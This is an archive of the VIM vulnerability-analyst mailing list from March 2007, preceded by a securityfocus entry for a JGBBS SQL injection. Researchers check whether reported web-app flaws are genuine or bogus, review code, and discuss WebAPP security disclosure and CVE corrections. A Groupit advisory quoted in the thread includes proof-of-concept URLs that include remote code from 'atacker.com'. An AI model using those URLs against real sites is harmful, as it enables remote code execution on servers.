securityfocus.com JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Type : SQL Injection Release Date : {2007-03-13} Product / Vendor : JGBBS Is a Tree-style Online Forum System http://sourceforge.net/projects/jgbbs/ Bug : http://localhost/script/search.asp?author=-SQL Inj.-&bid=0 SQL Injection Exploit : JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
SQL Injection Code  
Search Board    
UniquE-Key{UniquE-Cracker}
UniquE at UniquE-Key.ORG
http://UniquE-Key.ORG
Tested : JGBBS 3.0beta1 Vulnerable : JGBBS 3.0beta1 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From coley at mitre.org Wed Mar 14 17:04:08 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 14 Mar 2007 13:04:08 -0400 (EDT) Subject: [VIM] [false] Remote File Include In Script PHP Photo Album Message-ID: <200703141704.l2EH48Vw020813@faron.mitre.org> Researcher: Hasadya Raed Ref: BUGTRAQ:20070311 Remote File Include In Script PHP Photo Album http://www.securityfocus.com/archive/1/archive/1/462559/100/0/threaded from versions 0.3.2.6 (http://www.phpalbum.net/dw) and Beta 0.4.1-beta9 and beta8 (http://www.phpalbum.net/), we have: 1) NO file named common.php 2) NO string "db_file" in any file - Steve From f.riphagen at nsec.nl Thu Mar 15 19:44:16 2007 From: f.riphagen at nsec.nl (Ferdy Riphagen) Date: Thu, 15 Mar 2007 20:44:16 +0100 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability Message-ID: <45F9A210.8080408@nsec.nl> html/content.php contains: I couldn't find load.inc.php, userprofile.php, dispatch.php (or I need some sleep) sources: http://fresh.t-systems-sfr.com/unix/src/privat2/groupit-2.00b5.tar.gz/ -------- Original Message -------- ECHO_ADV_75$2007 ------------------------------------------------------------------------------------- [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability -------------------------------------- ---------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : March, 15th 2007 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv75-theday-2007.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Groupit version : 2.00b5 URL : http://fresh.t-systems-sfr.com/fresh/unix/src/privat2/groupit-2.00b5.tar.gz --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~ - Invalid include function at html/content.php -----------------------html/content.php------------ ---------------------------------------------------------- Input passed to the "$c_basepath" parameter in load.inc.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. also affected files : html/userprofile.php html/password.php html/dispatch.php html/deliver.php and More .... Proof Of Concept: ~~~~~~~~~~~~ http://localhost/groupit/html/content.php?c_basepath=http://atacker.com/inject.txt? http://localhost/groupit/html/userprofile.php?c_basepath=http://atacker.com/inject.txt? http://localhost/groupit/html/password.php?c_basepath=http://atacker.com/inject.txt? Solution: ~~~~ - Sanitize variable $c_basepath affected files. - Turn off register_globals --------------------------------------------------------------------------- Shoutz: ~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy Nice Girl ~ az001,bomm_3x,matdhule ~ newbie_hacker at yahoogroups.com ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~ EcHo Research & Development Center http://advisories.echo.or.id erdc[at]echo[dot]or[dot]id the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]---------------------------------- From coley at linus.mitre.org Thu Mar 15 19:53:14 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Mar 2007 15:53:14 -0400 (EDT) Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A210.8080408@nsec.nl> References: <45F9A210.8080408@nsec.nl> Message-ID: hmmmm. This was reported by the_day, who's been around for a couple years and has been pretty reliable in my experience. I'm not contradicting you Ferdy, I just wonder where the disconnect is. This one begs for some resolution. - Steve From theall at tenablesecurity.com Thu Mar 15 20:09:49 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 15 Mar 2007 16:09:49 -0400 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A210.8080408@nsec.nl> References: <45F9A210.8080408@nsec.nl> Message-ID: <45F9A80D.5030106@tenablesecurity.com> On 03/15/07 15:44, Ferdy Riphagen wrote: > html/content.php contains: > $c_category = !isset($c_category)? "":$c_category; > include "./basepath.php"; > $c_module = "content"; > include "$c_basepath/base/groupit.start.inc"; .. > After normal install basepath.php has (my case) > $c_basepath = "/chroot/apache2/www/test/groupit/groupit"; > $c_block_cache = 1; > ?> > > I couldn't find load.inc.php, userprofile.php, dispatch.php (or I need > some sleep) I haven't set it up, but looking at the code in groupit/base/groupit.start.inc I see it registers any global variables passed in if register_globals is disabled or magic_quotes_gpc is enabled; eg, if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc())) { /* Register our own global variables when register_globals in php.ini is disabled. */ reset($HTTP_ENV_VARS); reset($HTTP_GET_VARS); reset($HTTP_POST_VARS); reset($HTTP_COOKIE_VARS); reset($HTTP_SERVER_VARS); while (list ($key, $val) = each ($HTTP_POST_FILES)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_ENV_VARS)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_GET_VARS)) $GLOBALS[$key]=stripslashes($val); while (list ($key, $val) = each ($HTTP_POST_VARS)) $GLOBALS[$key]=stripslashes($val); while (list ($key, $val) = each ($HTTP_COOKIE_VARS)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_SERVER_VARS)) $GLOBALS[$key]=$val; So while I don't know about the missing files, it does seem that an attacker may be able to overwrite $c_basepath, which will then be used further down in this file to include at least two files. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Thu Mar 15 20:03:48 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 15 Mar 2007 14:03:48 -0600 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A210.8080408@nsec.nl> References: <45F9A210.8080408@nsec.nl> Message-ID: <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> How goes it Ferdy, content.php contains: line 5: include "$c_basepath/base/groupit.start.inc"; groupit.start.inc contains (if ! register_globals or if magic quotes = on the program is vulnerable) if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc())) { /* Register our own global variables when register_globals in php.ini is disabled. */ reset($HTTP_ENV_VARS); reset($HTTP_GET_VARS); reset($HTTP_POST_VARS); reset($HTTP_COOKIE_VARS); reset($HTTP_SERVER_VARS); while (list ($key, $val) = each ($HTTP_POST_FILES)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_ENV_VARS)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_GET_VARS)) { $GLOBALS[$key]=stripslashes($val); echo "$key $val"; } while (list ($key, $val) = each ($HTTP_POST_VARS)) $GLOBALS[$key]=stripslashes($val); while (list ($key, $val) = each ($HTTP_COOKIE_VARS)) $GLOBALS[$key]=$val; while (list ($key, $val) = each ($HTTP_SERVER_VARS)) $GLOBALS[$key]=$val; if (is_array($HTTP_POST_FILES)) { reset($HTTP_POST_FILES); while (list($key, $val) = each($HTTP_POST_FILES)) { $GLOBALS[$key] = $val['tmp_name']; $GLOBALS["$key" . "_name"] = $val['name']; $GLOBALS["$key" . "_size"] = $val['size']; $GLOBALS["$key" . "_type"] = $val['type']; } } } Later down the file line 96. Contains: include "$c_basepath/base/groupit.library.inc"; I'm pretty sure this is where the vuln is occuring. /str0ke From theall at tenablesecurity.com Thu Mar 15 20:11:16 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 15 Mar 2007 16:11:16 -0400 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> Message-ID: <45F9A864.4080909@tenablesecurity.com> On 03/15/07 16:03, str0ke wrote: > content.php contains: I hate it when that happens! I swear, I did poll for new mail before I sent my message... :-( George -- theall at tenablesecurity.com From str0ke at milw0rm.com Thu Mar 15 20:15:22 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 15 Mar 2007 14:15:22 -0600 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A864.4080909@tenablesecurity.com> References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com> Message-ID: <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com> On 3/15/07, George A. Theall wrote: > I hate it when that happens! I swear, I did poll for new mail before I 2 confirms is always better then 1 ;) /str0ke From f.riphagen at nsec.nl Thu Mar 15 20:24:12 2007 From: f.riphagen at nsec.nl (Ferdy Riphagen) Date: Thu, 15 Mar 2007 21:24:12 +0100 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A80D.5030106@tenablesecurity.com> References: <45F9A210.8080408@nsec.nl> <45F9A80D.5030106@tenablesecurity.com> Message-ID: <45F9AB6C.7070506@nsec.nl> Did I missed that...%&#) > On 03/15/07 15:44, Ferdy Riphagen wrote: > >> html/content.php contains: >> > $c_category = !isset($c_category)? "":$c_category; >> include "./basepath.php"; >> $c_module = "content"; >> include "$c_basepath/base/groupit.start.inc"; > .. >> After normal install basepath.php has (my case) >> > $c_basepath = "/chroot/apache2/www/test/groupit/groupit"; >> $c_block_cache = 1; >> ?> >> >> I couldn't find load.inc.php, userprofile.php, dispatch.php (or I >> need some sleep) > > I haven't set it up, but looking at the code in > groupit/base/groupit.start.inc I see it registers any global variables > passed in if register_globals is disabled or magic_quotes_gpc is > enabled; eg, > > if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc())) > { > /* Register our own global variables when register_globals in > php.ini is disabled. */ > reset($HTTP_ENV_VARS); > reset($HTTP_GET_VARS); > reset($HTTP_POST_VARS); > reset($HTTP_COOKIE_VARS); > reset($HTTP_SERVER_VARS); > while (list ($key, $val) = each ($HTTP_POST_FILES)) > $GLOBALS[$key]=$val; > while (list ($key, $val) = each ($HTTP_ENV_VARS)) > $GLOBALS[$key]=$val; > while (list ($key, $val) = each ($HTTP_GET_VARS)) > $GLOBALS[$key]=stripslashes($val); > while (list ($key, $val) = each ($HTTP_POST_VARS)) > $GLOBALS[$key]=stripslashes($val); > while (list ($key, $val) = each ($HTTP_COOKIE_VARS)) > $GLOBALS[$key]=$val; > while (list ($key, $val) = each ($HTTP_SERVER_VARS)) > $GLOBALS[$key]=$val; > > So while I don't know about the missing files, it does seem that an > attacker may be able to overwrite $c_basepath, which will then be used > further down in this file to include at least two files. > > > George From f.riphagen at nsec.nl Thu Mar 15 20:25:55 2007 From: f.riphagen at nsec.nl (Ferdy Riphagen) Date: Thu, 15 Mar 2007 21:25:55 +0100 Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com> References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com> <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com> Message-ID: <45F9ABD3.7070807@nsec.nl> str0ke wrote: > On 3/15/07, George A. Theall wrote: >> I hate it when that happens! I swear, I did poll for new mail before I > > 2 confirms is always better then 1 ;) > > /str0ke > > > You both are right. I see it too now... I go to sleep. From coley at linus.mitre.org Thu Mar 15 20:34:17 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 15 Mar 2007 16:34:17 -0400 (EDT) Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability In-Reply-To: <45F9A864.4080909@tenablesecurity.com> References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com> Message-ID: On Thu, 15 Mar 2007, George A. Theall wrote: > On 03/15/07 16:03, str0ke wrote: > > > content.php contains: > > I hate it when that happens! I swear, I did poll for new mail before I > sent my message... :-( Nah, it just goes to show that brilliance operates in parallel :) - Steve From coley at linus.mitre.org Fri Mar 16 20:23:03 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 16 Mar 2007 16:23:03 -0400 (EDT) Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot] In-Reply-To: <20070307230204.GT17103@securityfocus.com> References: <20070307230204.GT17103@securityfocus.com> Message-ID: Below is a writeup from a CVE analyst that suggests that versions *before* 1.7.3 were vulnerable, and that it got patched: http://carbonize.co.uk/Lazarus/Forum/index.php?topic=1164.0 ACCURACY: 1.7.3 is not vulnerable. Its admin.php has these four code sections in this safe order: (1) extract all GPC variables using the typical "$$name = $value" approach, (2) check for an inclusion attack: if (isset($include_path)) { die("Hacking Attempt!"); }, (3) define include_path before use: $include_path = dirname(__FILE__);, (4) use $include_path in various require_once and include statements within the application. The last previous available version (1.7) of admin.php uses a different ordering. Based on the vendor's comments below, this unsafe ordering apparently persisted up until 1.7.2. The unsafe ordering is: (1) $include_path = dirname(__FILE__);, (2) immediately use $include_path in require_once statements (this is OK), (3) extract all GPC variables using the typical "$$name = $value" approach, thus overwriting $include_path, (4) call an external constructor, located in the template.class.php file: new gb_template($include_path);, (5) the gb_template constructor sets $this->root_dir to the unsafe value of $include_path, (6) other functions in the gb_template class use $this->root_dir for inclusion, e.g., get_content calls include $this->root_dir.'/lang/english.php';, (7) there is always a call to this get_content function within the main flow of control in admin.php. In other words, admin.php in versions before 1.7.3 doesn't allow remote file inclusion within this file itself, but does trigger remote file inclusion in a different file. ACKNOWLEDGEMENT: The vendor says "March 03, 2007 ... An [sic] cross site scripting vulnerability exists in Lazarus and so I have released 1.7.3 to patch it." The vendor apparently misunderstands the term cross site scripting, and actually meant that a php-include vulnerability was fixed. The vendor also (on 20070304) responds to a request about how to manually patch by saying "Open admin.php and find the ... if (!isset($PHP_SELF)) ... block ... and move it to before where $include_path is set. Just download the update and look at admin.php to see what I mean." In other words, the vendor is indicating that include_path must be set safely after the GPC variable extraction occurs. The application only uses include_path in require/include statements. It does not print out the value of include_path. Thus, it is fairly clear that the vendor was not actually talking about an XSS vulnerability. From theall at tenablesecurity.com Mon Mar 19 11:18:55 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 19 Mar 2007 07:18:55 -0400 Subject: [VIM] Bogus - [CLBOX <= (signup.php header) Remote File Include Vulnerability] Message-ID: <45FE719F.601@tenablesecurity.com> In signup.php, we have: require "inc/lib.inc"; @include "$header"; and at the base of the include file we see: $header = "../header.php"; While I haven't bothered to actually install the software, this sure looks bogus to me. George -- theall at tenablesecurity.com From jericho at attrition.org Tue Mar 20 11:01:38 2007 From: jericho at attrition.org (security curmudgeon) Date: Tue, 20 Mar 2007 11:01:38 +0000 (UTC) Subject: [VIM] WebAPP Audit Message-ID: As most of you may have noticed, WebAPP has gone under a fairly heavy audit and the changelog for 0.9.9.5: http://www.web-app.org/cgi-bin/index.cgi?action=viewnews&id=250 Shortly after, 0.9.9.6 was released saying: "WebAPP had security audits done by professionals, and several previously uncovered major security issues were found, along with some more minor things that can negatively impact security." They aren't releasing details yet to give web sites a chance to upgrade. Shortly after that, they released a patch to fix a remote cookie manipulation based attack that can let a remote attacker take over the admin account: http://www.web-app.org/cgi-bin/index.cgi?action=downloadinfo&cat=crip&id=2 I'm a bit curious who the 'professionals' were that did the audit leading to 0.9.9.6 and the details of the subsequent exploit. From theall at tenablesecurity.com Tue Mar 20 11:31:08 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 20 Mar 2007 07:31:08 -0400 Subject: [VIM] WebAPP Audit In-Reply-To: References: Message-ID: <45FFC5FC.3050303@tenablesecurity.com> On 03/20/07 07:01, security curmudgeon wrote: > As most of you may have noticed, WebAPP has gone under a fairly heavy > audit and the changelog for 0.9.9.5: ... > I'm a bit curious who the 'professionals' were that did the audit > leading to 0.9.9.6 and the details of the subsequent exploit. I was looking at this last week. It seems like the WebAPP project has forked, with two groups bickering over control. The people maintaining webapp.net has been suggesting that the code as maintained by webapp.org can be abused to compromise a system. The maintainer of webapp.org solicited help from members of blackcode.com, who I suspect are the "security professionals" refered to in the advisory. Follow the fun here: http://newbc.blackcode.com/forum/index.php?t=msg&th=1167 I haven't had a chance to look into the latest patch, but I did find two vectors by which an authenticated attacker could execute arbitrary code in version 0.9.9.5, but that's subject to the privileges of the web server user id. George -- theall at tenablesecurity.com From webapp at sitespot.us Tue Mar 20 14:18:34 2007 From: webapp at sitespot.us (WebAPP) Date: Tue, 20 Mar 2007 06:18:34 -0800 Subject: [VIM] WebAPP Audit Message-ID: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> Hi, I came upon this email posted about our recent security issues with WebAPP. I am more than willing to communicate directly with anyone with an interest in the security issues we have been recently addressing at the WebAPP project at web-app.org. As you have noticed, we have been releasing several new releases lately. This is being done in an attempt to keep up with actual and threatened attacks against web-app.org members and their websites done by the group operating another "WebAPP" site at web-app.net since late May last year. WebAPP 0.9.9.5 was released as a bug fix package with some patches for some relatively minor client side XSS issues found near time of release by a member of blackcode.org. The request for help at blackcode was made by me in response to some news articles posted at DIGG by "Monty53" where he claimed our script had a major hole that allowed command execution on the server. Following that release, we continued to work on security. WebAPP 0.9.9.6 was a much more major overall upgrade including a patch for an issue so serious that I fear for the time the details of it may become publicly available. This vulnerability was found by another professional who wishes to remain anonymous for the sake of his career, again due to the threat of retaliatory attacks by web-app.net. The most recent cookies attack by "Monty53 of Turkey" to overtake the admin account at web-app.org was relatively trivial in comparison to the vulnerability mentioned above. I am convinced that this cookies problem has been a longstanding issue. The patch we released most recently should help prevent the method that was used in the case of the hack attack on the WebAPP site, but there are likely to be other ways and other things that have not yet been dealt with completely. We continue working at this time and have yet another release planned to be made public quite soon, with yet more security work. Apparently On Elpeleg, our former Security Chief, overlooked some things during his supervision of security for the WebAPP project through May 2006 at web-app.org. Now Mr. Elpeleg has been demonstrating his realization of many of these long term security issues following his move to web-app.net, using web-app.org's membership and forums database, and where "WebAPP" version 0.9.9.3.4 is being released in a slightly modified form as "0.9.9.7". I must assert that our upgrades at web-app.org include a whole lot more work, security and otherwise. So that's pretty much where we stand. Since you seem to have taken an interest in this, please advise as to what, given the current circumstances, and with minimization of risk to users, you would like to see from the WebAPP project in the future regarding more complete security information. Thank you, Jos Brown web-app.org -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070320/6b949099/attachment.html From coley at mitre.org Tue Mar 20 21:28:01 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 20 Mar 2007 17:28:01 -0400 (EDT) Subject: [VIM] Typo in researcher credits for "file" vulnerability Message-ID: <200703202128.l2KLS1Yd009965@faron.mitre.org> MLIST:[file] 20070302 file-4.20 is now available URL:http://mx.gw.com/pipermail/file/2007/000161.html CONFIRM:https://bugs.gentoo.org/show_bug.cgi?id=171452 The original vendor disclosure credited "Jean-Sebastien Guay-Lero," and this cascaded everywhere. But it's most likely "Jean-Sebastien Guay-Leroux," who's reported a few issues in the past. - Steve From ge at linuxbox.org Tue Mar 20 21:49:53 2007 From: ge at linuxbox.org (Gadi Evron) Date: Tue, 20 Mar 2007 16:49:53 -0500 (CDT) Subject: [VIM] Typo in researcher credits for "file" vulnerability In-Reply-To: <200703202128.l2KLS1Yd009965@faron.mitre.org> Message-ID: On Tue, 20 Mar 2007, Steven M. Christey wrote: > > MLIST:[file] 20070302 file-4.20 is now available > URL:http://mx.gw.com/pipermail/file/2007/000161.html > CONFIRM:https://bugs.gentoo.org/show_bug.cgi?id=171452 > > The original vendor disclosure credited "Jean-Sebastien Guay-Lero," > and this cascaded everywhere. But it's most likely "Jean-Sebastien > Guay-Leroux," who's reported a few issues in the past. I was recently quoted and some stuff was attributed to me in a book. I was refered to as "Evi Gadron". hehe > > - Steve > From webapp at sitespot.us Wed Mar 21 17:03:38 2007 From: webapp at sitespot.us (WebAPP) Date: Wed, 21 Mar 2007 09:03:38 -0800 Subject: [VIM] WebAPP Audit References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> Message-ID: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> There was an attempt again today to hijack the admin account using altered cookies. This attempt was unsuccessful. We know who made the attempt and suspect it to be the same person as last time. This time the method was recorded. If the same method was used, apparently the current patch we are using on the site is successful at preventing this. There will be a new version out soon. Guys, It's not very helpful to read about how people have found exploits and not be told what they are. We're trying our best at web-app.org to catch up with long neglected security issues. Any information you might have would be helpful. Were you saying you found some exploits? Jos Brown web-app.org -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070321/7c3068b7/attachment-0001.html From coley at mitre.org Wed Mar 21 17:29:57 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 21 Mar 2007 13:29:57 -0400 (EDT) Subject: [VIM] Clarification on MySQL versions for single-row subselect DoS Message-ID: <200703211729.l2LHTvox002629@faron.mitre.org> FYI, MySQL notified CVE that this was originally reported as being before 5.0.37, but it's before 5.0.36. It was also originally reported by a different organization, so we have another parallel discovery if anybody tracks those things. What wasn't originally entirely apparent to me was that this seems to be an issue only when doing sorting on a set with just one row. I bet there are similar bugs out there in other products with similar difficulties. - Steve ====================================================== Name: CVE-2007-1420 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1420 Reference: BUGTRAQ:20070309 SEC Consult SA-20070309-0 :: MySQL 5 Single Row Subselect Denial of Service Reference: URL:http://www.securityfocus.com/archive/1/archive/1/462339/100/0/threaded Reference: MISC:http://www.sec-consult.com/284.html Reference: CONFIRM:http://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-36.html Reference: CONFIRM:http://bugs.mysql.com/bug.php?id=24630 Reference: BID:22900 Reference: URL:http://www.securityfocus.com/bid/22900 Reference: FRSIRT:ADV-2007-0908 Reference: URL:http://www.frsirt.com/english/advisories/2007/0908 Reference: SECUNIA:24483 Reference: URL:http://secunia.com/advisories/24483 MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function. From coley at mitre.org Wed Mar 21 18:10:05 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 21 Mar 2007 14:10:05 -0400 (EDT) Subject: [VIM] uh-oh - MARC Message-ID: <200703211810.l2LIA5PH003424@faron.mitre.org> Uh-oh, my URL's to marc.theaimsgroup.com are being forwarded to marc.info/. And the background is white, too. At least the URL's seem to be preserved across the redirects. - Steve From steve at vitriol.net Wed Mar 21 18:26:37 2007 From: steve at vitriol.net (Steve Tornio) Date: Wed, 21 Mar 2007 13:26:37 -0500 Subject: [VIM] uh-oh - MARC In-Reply-To: <200703211810.l2LIA5PH003424@faron.mitre.org> References: <200703211810.l2LIA5PH003424@faron.mitre.org> Message-ID: <460178DD.9070807@vitriol.net> Steven M. Christey wrote: > Uh-oh, my URL's to marc.theaimsgroup.com are being forwarded to > marc.info/. And the background is white, too. At least the URL's > seem to be preserved across the redirects. > > - Steve > From their news page: 2007-03-18 The name trasition to marc.info has kicked in. All old links to http://marc.theaimsgroup.com/foo will still work, but will result in a 301 redirect to the new corresponding URL. Wherever possible/convenient, please update your links in documentation, support web pages, etc to point to the new name. But, old links will continue to work indefinitely. [...] 2007-03-08 MARC is changing domain names! The site will soon switch to being marc.info, instead of marc.theaimsgroup.com. Links to the old URLs will still work, for the Internet definition of forever; they'll just get redirected. Several reasons for this. First, it's shorter, and I am a huge fan of short URLs. Second, The AIMS Group, the company that originally[*] sponsored MARC, ceased to exist a long time ago. The same people have been 10 East for years now, and have continued co-hosting MARC, but the old name, marc.theaimsgroup.com was already embedded in all kinds of project documentation, etc, so I was reluctant to change it. But it is time for MARC to be established as its own entity. [*] Actually, the first sponsor was Progressive Computer Concepts, which was the company name in the mid-90's before they became AIMS. http://marc.info/?q=news From coley at linus.mitre.org Wed Mar 21 18:50:09 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 21 Mar 2007 14:50:09 -0400 (EDT) Subject: [VIM] WebAPP Audit In-Reply-To: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> Message-ID: On Wed, 21 Mar 2007, WebAPP wrote: > Guys, It's not very helpful to read about how people have found exploits > and not be told what they are. We're trying our best at web-app.org to > catch up with long neglected security issues. Any information you might > have would be helpful. George, is he talking about your claim yesterday that you found some holes in an older version? - Steve From theall at tenablesecurity.com Thu Mar 22 01:55:27 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 21 Mar 2007 21:55:27 -0400 Subject: [VIM] WebAPP Audit In-Reply-To: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> Message-ID: <4601E20F.8090606@tenablesecurity.com> On 03/21/07 13:03, WebAPP wrote: > Guys, It's not very helpful to read about how people have found exploits > and not be told what they are. Are you referring to my posting yesterday? If so, perhaps it would help if I rephrased... In looking at the code changes between 0.9.9.5 and 0.9.9.6, I found two vulnerabilities that had been patched and that allowed for arbitrary code execution by an authenticated user. These are issues that have already been identified and fixed in 0.9.9.6. Understand that this was a review of the *changes* made, not a code audit itself. You asked in an earlier message what we would like to see with regards to security information from your project. I'm a bit surprised not to have seen at least Jericho rise to the challenge, but personally I'd like to see more information. Telling people that there's a serious set of flaws in a software package and that they need to upgrade asap might seem helpful at first blush, but in today's environment, people need a way to prioritize. Give them basic information about the flaws so they can understand the risks involved in not reacting right away. Are we dealing with a cross-site scripting flaw that can be triggered when an admin views application logs? A remote file include flaw that's exploitable only if PHP's register_globals is enabled (yeah, I know WebAPP uses Perl, not PHP, but I'm talking generally here)? A SQL injection in a login page by which an attacker can gain admin access? A design flaw by which the shopping cart's sales database is in a web-accessible location? A feature that lets users upload arbitrary files and then run them as a non-root user? This sort of information will go a long way to helping your users assess the risks they face. P.S. I wouldn't be surprised if telling people they really Really REALLY need to upgrade motivates malicious people to discover what's been patched more than it convinces others to upgrade their own systems. George -- theall at tenablesecurity.com From webapp at sitespot.us Thu Mar 22 05:40:34 2007 From: webapp at sitespot.us (WebAPP) Date: Wed, 21 Mar 2007 21:40:34 -0800 Subject: [VIM] WebAPP Audit References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net><000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> <4601E20F.8090606@tenablesecurity.com> Message-ID: <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net> Now this is helpful. Thank you George. Also it's good news to hear that you found the differences and see our patches to be at least somewhat appropriate. I understand what you mean about potential hackers figuring out the problem before the users. Lately the biggest threat has been from advocates of an opposing group who does not want web-app.org to survive (who incidentally still do not have their release patched). But still of course there are others. We were careful with this one and sent out a newsletter security bulletin to subscribers over a week ahead of time telling of the coming update. We held back the exact information on the vulnerable area and did not release a separate patch for the specific issue because it can be so deadly and because of the typical hesitance of most WebAPP users to upgrade. Many of them are still running versions from 2003, and you've probably heard of a few of the security issues we've had to clean up since then. Having seen the vulnerability now for yourself, what is your opinion on making a report of it? As for the Secunia Advisory at http://secunia.com/advisories/24227 , I will forward to you a copy of what I originally emailed to vuln at secunia.com . I assumed the Advisory to be a result of my report. Not sure why Secunia's description is so much shorter. ***** Hello, WebAPP (Web Automated Perl Portal) has recently had a security audit. Several issues were uncovered, including the following: Form input validation flaws. It was found possible to insert certain characters in order to obtain unexpected results from form submissions. Data files could be corrupted by percent encoded or otherwise escaped character insertion. Under certain conditions, forms could be exploited to allow undesired access to private files. With expert use, this could be exploited to execute code on the host server. Cross Site Scripting vulnerabilities in Drop Downs. XSS strings entered in the URL query string could cause javascript alert execution in the user's browser. Various Cross Site Scripting vulnerabilities. Submission of various forms could cause javascript alert execution in the user's browser when viewing the form results pages. Data Corruption by query string manipulation. Query strings could be crafted to open files and write with the wrong data. File type validation flaws. It was possible to inject files of unknown types onto the host server by manipulating the file name and/or using percent encoding in forms. Impact: Cross Site Scripting Manipulation of data Exposure of sensitive information System access Any real exploits for the above issues are possible for registered site members only and require authorizaton, thus implying a trust factor, and they are logged. Most of the cross site scripting issues are client side only. There is a new security upgrade release of WebAPP v0.9.9.6 